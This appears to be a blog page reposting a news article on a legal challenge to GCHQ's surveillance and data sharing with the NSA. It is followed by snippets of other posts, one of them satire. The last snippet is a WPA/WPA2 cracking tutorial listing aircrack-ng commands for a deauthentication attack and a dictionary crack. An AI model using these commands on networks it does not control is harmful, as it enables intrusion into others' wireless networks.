Skip to main content

Extent Of U.K.’s Surveillance Dragnet Probed In Fresh Legal Challenge


A new legal challenge to U.K. intelligence agency surveillance practices has been filed in the U.K. by human rights organization Human Rights Watch and three unnamed individuals working in security research, investigative journalism and law. The action is aimed at ascertaining the scope of illegal data-sharing that took place between the NSA and GCHQ.
The move follows a landmark legal ruling, back in February, when the IPT — the court which oversees the U.K.’s domestic intelligence agencies — ruled that prior to December 2014 GCHQ had acted illegally by receiving data from the NSA’s surveillance dragnets.  It was the first time in the court’s 15 year history it had ruled against the agencies.
The claims filed today with the IPT will “seek to establish whether GCHQ has spied on the claimants, whether their communications were part of those unlawfully shared between NSA and GCHQ, and how the Tribunal  is interpreting intelligence sharing”, according to pro-privacy organization Privacy International, which was one of the groups which brought the earlier legal challenge.
This June the IPT also found that GCHQ had acted unlawfully in handling intercepted communications data — although the court blamed “error” and “technical” failures for what it said were ‘breaches of internal policies’. That judgment also revealed that two human rights organizations’ communications had been targeted by the intelligence agencies — one of which, the IPT subsequently confirmed, was Amnesty International.
The revelation that the communications of human rights organizations were being targeted by government intelligence agencies is consistent with disclosures by NSA whistleblower Edward Snowden — who told a European parliamentary hearing back in April 2014 that the NSA had spied on human rights groups.
Today’s legal action seeks to probe for further confirmations of the scope of U.K. intelligence agency spying activity — such as whether journalists, lawyers and security experts have also been directly targeted by state surveillance agencies in the recent past.
Commenting on today’s action in a statement, Dinah PoKempner, general counsel at Human Rights Watch, said: “Surveillance on a massive scale and data swapping without suspicion or independent oversight pose a grave threat to the lives, safety and work of human rights defenders, researchers, journalists, lawyers and their sources.  We are bringing this case because those who work to protect human rights and expose abuses and war crimes depend on confidentiality of communications.”
In a crowdsourced pincer movement, Privacy International has also today launched what it’s calling ‘phase two’ of an earlier attempt to make it easy for any web user to find out whether GCHQ spied on them. The organization previously set up an online form to gather sign-ups and authorizations for its legal team to act as a go between claimants and the IPT and GCHQ.
However, earlier this year, the IPT declined to hear consolidated claims — instead insisting that each potential claimant file his or her own complaint individually. Privacy International has now launched another online mechanism aimed at making the process of individual claim-filing easier for people wanting to request information on whether the U.K. spied on them.
As of last May more than 25,000 people had signed up under phase one of the campaign. Those people (and/or organizations) will now need to re-submit individual claims if they want the tribunal to take notice of their requests.

Comments

Popular posts from this blog

Building a smarter home

The Jetsons  presented a highly entertaining vision of what  homes  of the future would  look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s  homes  and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019,  companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...

Oculus’ New $99 Samsung Gear VR Makes Serious Virtual Reality Affordable

At half the price of its last mobile VR headset, the new $99  Oculus-made  Samsung Gear VR is cheap enough to unlock virtual reality for the mainstream. Revealed today at the Oculus Connect conference, it works with the whole 2015 line of Samsung Smartphones including the Note 5, S6, S6 Edge, and S6 Edge+. It will ship in November in time for Black Friday. Compared to the $199 previous Gear VRs that only worked with fewer phones, this headset will be a lot more accessible. The new Gear VR is 22% lighter, making it more comfortable to wear. The trackpad on the temple of the headset also now has a tactile directional pad on it so your finger will know where it’s touching. The previous Gear VRs had a smooth trackpad and sometimes it was to tough to know if you were touching it or just the unsensitive shell of the headset when you couldn’t see for yourself. There’s also a new Gear VR Gamepad which all the Oculus Connect conference attendees will get for free. It features an...

Careless USB removal causes multiple deaths

EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.